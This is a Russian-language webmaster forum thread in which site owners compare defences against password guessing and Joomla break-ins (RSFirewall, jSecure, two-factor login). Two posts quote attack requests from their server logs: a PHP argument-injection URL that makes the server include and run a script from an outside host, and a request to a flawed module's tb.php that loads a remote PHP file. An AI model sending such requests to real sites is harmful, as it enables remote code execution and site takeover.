1. Приветствуем Вас на нашем закрытом форуме для складчиков сайта cmsheaven.org. Если Вы частный вебмастер, фрилансер, владелец малого или среднего бизнеса, представитель студии по разработке сайтов - будем рады видеть Вас в наших рядах экономных людей.
    Регистрация на форуме возможна только после вступления в складчину

Вирусы, Шеллы, редиректы итд

Тема в разделе "Вебмастерская", создана пользователем Виталий, 18 окт 2014.

  1. webstudia

    webstudia Свой человек

    Регистрация:
    10 окт 2014
    Сообщения:
    1.130
    Симпатии:
    220
    Работает это так
    Вы поставили в настройках включение капчи после 3 неудачных попыток входа. И блокировка после 5 неудачных.
    Итак... Посетитель или робот заходят первый раз, вводят с ошибкой и бац +1 к неверному паролю.
    Второй раз, +1 к неверному паролю
    3 раз +1 к неверному паролю.
    Включается капча и тут уже на уровне капчи человека не пускает проверить имя и пароль. Т.е. нет проверки имени и пароля, так как блокирует капча. Так как капчу скорей всего тоже неверно ввели.
    Вот и получается что все эти неверные попытки могут плюсоваться. 5-6 попыток - это нормально и не страшно. пусть себе пытаются, защита хорошо срабатывает. А 99% попыток взлома, делается роботами.
    Им пофиг, они могут месяцами долбиться, пока их хозяин не уберёт ваш сайт из списка ПОД СНОС.
    Сидит какой-нибудь хрен. Берёт список вновь купленных доменов.
    И запускает программу долбилку (перебор паролей) на все эти сайты новые. Так как на новом сайте редко защита есть.
    И таких сайтов в списке для атаки у этих гадов тысячи. В 99,999% ваш сайт ломают не конкуренты, а какие-нибудь хакеры из индии, занзибара и т.д.
    Для того чтобы полностью сломать или напихать рекламы или чтобы потом деньги вымогать за починку.
    Так что не паникуйте ;)
    #21
    vet86 и Victoria нравится это.
  2. Victoria

    Victoria Опытный складчик

    Регистрация:
    2 дек 2014
    Сообщения:
    45
    Симпатии:
    23
    Да :) Мой IP в белом списке. Я имею ввиду блокировка автоматическая, если например несколько раз ввели не верный лог и пароль к административной части. это позволяет с подбором пароля бороться.
    webstudia Несколько дней мониторила - теперь лишь пара страниц. Значит все таки работает :)))
    Меня уже пытались и wordpress - овской ссылкой взломать. Вот людям покоя нет ))
    Домену кстати 4 года моему
    #22
  3. game

    game Опытный складчик

    Регистрация:
    29 ноя 2014
    Сообщения:
    84
    Симпатии:
    6
    а что такое isp?
    #23
  4. webstudia

    webstudia Свой человек

    Регистрация:
    10 окт 2014
    Сообщения:
    1.130
    Симпатии:
    220
    #24
  5. Victoria

    Victoria Опытный складчик

    Регистрация:
    2 дек 2014
    Сообщения:
    45
    Симпатии:
    23
    #25
  6. webstudia

    webstudia Свой человек

    Регистрация:
    10 окт 2014
    Сообщения:
    1.130
    Симпатии:
    220
    Я ничего не понял, все ссылки не пашут. Да и не могут.
    #26
  7. Victoria

    Victoria Опытный складчик

    Регистрация:
    2 дек 2014
    Сообщения:
    45
    Симпатии:
    23
    Так я не про то. Видимо пытаются картинку с вирусов или скриптом каким то закинуть. по первой ссылке http://Мой-домен.ru/?-d allow_url_include=1 -d auto_prepend_file=http://onlinedieta.hop.ru/images/image2.txt
    Просто интересно что это за муть. Кто нибудь сталкивался с подобным?
    #27
  8. webstudia

    webstudia Свой человек

    Регистрация:
    10 окт 2014
    Сообщения:
    1.130
    Симпатии:
    220
    Это один из тысячи способов взлома сайтов. Не думайте об этом. Оно вам не надо, RSFirewall с ними сам справляется.
    Советую в настройках компонента, настроить так уведомления, чтоб не посылал СРЕДНИЕ. А то закалибает письмами :D
    #28
  9. OXYGEN

    OXYGEN Cкладчик

    Регистрация:
    13 окт 2014
    Сообщения:
    18
    Симпатии:
    2
    У меня в основном сайты на joomla ломали через SQL инъекцию. С третье веткой вроде такого пока не наблюдается.
    #29
  10. Николай

    Николай Мастер

    Регистрация:
    11 окт 2014
    Сообщения:
    88
    Симпатии:
    77
    Доктор Айболит показал мне время ожидания проверки 8 часов. Почувствовал себя работающим на "динозавре" ...
    Ещё можно проверять онлайн сервисом http://seculine.ru/virustestonline , особенно для успокоения клиентов )))
    Сам уже давно проверяю вручную через Тотал Командер
    Полезный раздел, благодарю ;)
    #30
  11. Алекс

    Алекс Cкладчик

    Регистрация:
    20 янв 2015
    Сообщения:
    29
    Симпатии:
    8
    Турки, вчера взломали сайт уже второй раз. Joomla 3

    Причем при взломе удаляли все файлы сайта и оставляли свою заглушку index.php

    Просмотрев все детально в error_log увидел, что было куча попыток подбора паролей в админку.

    Задумался.... стоял RSFirewall, пароль был сложный, логин также не admin

    (Правда надо отметить что в журнал RSFirewall не заглядывал, там уже очень давно отражалось что турки ведут подбор пароля)

    Так как же они смогли подобрать пароль?

    Очень просто, оказывается я при покупке шаблона установил quick start и не заметил что там был demo пользователь

    Его они и подобрали!

    Теперь использую такую связку:
    jSecure Authentication
    + Двухфакторная аутентификация (стандартный плагин joomla)
    #31
  12. israsky

    israsky Матерый складчик

    Регистрация:
    9 окт 2014
    Сообщения:
    186
    Симпатии:
    25
    jSecure Authentication использую уже давно на всех сайтах клиента. Подбор пароля с ним не грозит.
    #32
  13. webstudia

    webstudia Свой человек

    Регистрация:
    10 окт 2014
    Сообщения:
    1.130
    Симпатии:
    220
    RSFirewall - все переборы паролей фиксирует и может банить. Ну там ещё куча всяких защитных примочек.
    Можно в настройках выставить как я делаю всегда:
    Максимум 5 попыток ввода пароля
    После 3й попытки включается каптча
    После 5го раза банит по IP.
    И тут любая падла с перебором будет нюхать писю :D
    И никакие jSecure не нужны.
    Последнее редактирование: 2 фев 2015
    #33
    Victoria и deivion4ik нравится это.
  14. vet86

    vet86 Матерый складчик

    Регистрация:
    24 ноя 2014
    Сообщения:
    389
    Симпатии:
    78
    Все таки jSecure лучше бы поставить, хотя бы для того чтобы всякие юные хакары не баловались. А то набирают пароли 12345, 1qaz и прочие, нефиг ерундой заниматься )).
    #34
  15. webstudia

    webstudia Свой человек

    Регистрация:
    10 окт 2014
    Сообщения:
    1.130
    Симпатии:
    220
    С RSFirewall этой фигни не надо. Зачем самому себе и клиенту геморрой добавлять в виде замудрёных ссылок на админку.
    RSFIrewall - банит всех негодяев и не нужно извращаться. начался перебор, хлоп он в бане по IP.
    В нём можно банить целые страны. Галочки поставил и всё, иностранцы не могут открыть сайт.
    #35
  16. vet86

    vet86 Матерый складчик

    Регистрация:
    24 ноя 2014
    Сообщения:
    389
    Симпатии:
    78
    На вкус и цвет... Я лично ставлю на каждый свой сайт, не люблю когда пароли подбирают, не даю возможности.
    #36
  17. modern.po

    modern.po Админ Команда форума

    Регистрация:
    25 авг 2014
    Сообщения:
    842
    Симпатии:
    497
    Да и кстати в RSFirewall так же можно сделать двойной пароль, за примером далеко ходить не надо :))
    #37
    Coresolo, deivion4ik и webstudia нравится это.
  18. webstudia

    webstudia Свой человек

    Регистрация:
    10 окт 2014
    Сообщения:
    1.130
    Симпатии:
    220
    admin
    12345

    :D
    #38
    modern.po нравится это.
  19. modern.po

    modern.po Админ Команда форума

    Регистрация:
    25 авг 2014
    Сообщения:
    842
    Симпатии:
    497
    Осторожнее с неправильным вводом паролей - может забанить по ip :))
    #39
    deivion4ik нравится это.
  20. vet86

    vet86 Матерый складчик

    Регистрация:
    24 ноя 2014
    Сообщения:
    389
    Симпатии:
    78
    Уже не первый раз на мой сайт идут вот такие запросы modules/mod_raxo_allmode/tools/tb.php?src=http://picasa.com.sikaram.lk/hatz.php Я в этом мало понимаю но что-то мне подсказывает что в модуле raxo (я его не использую) есть дыра :)
    #40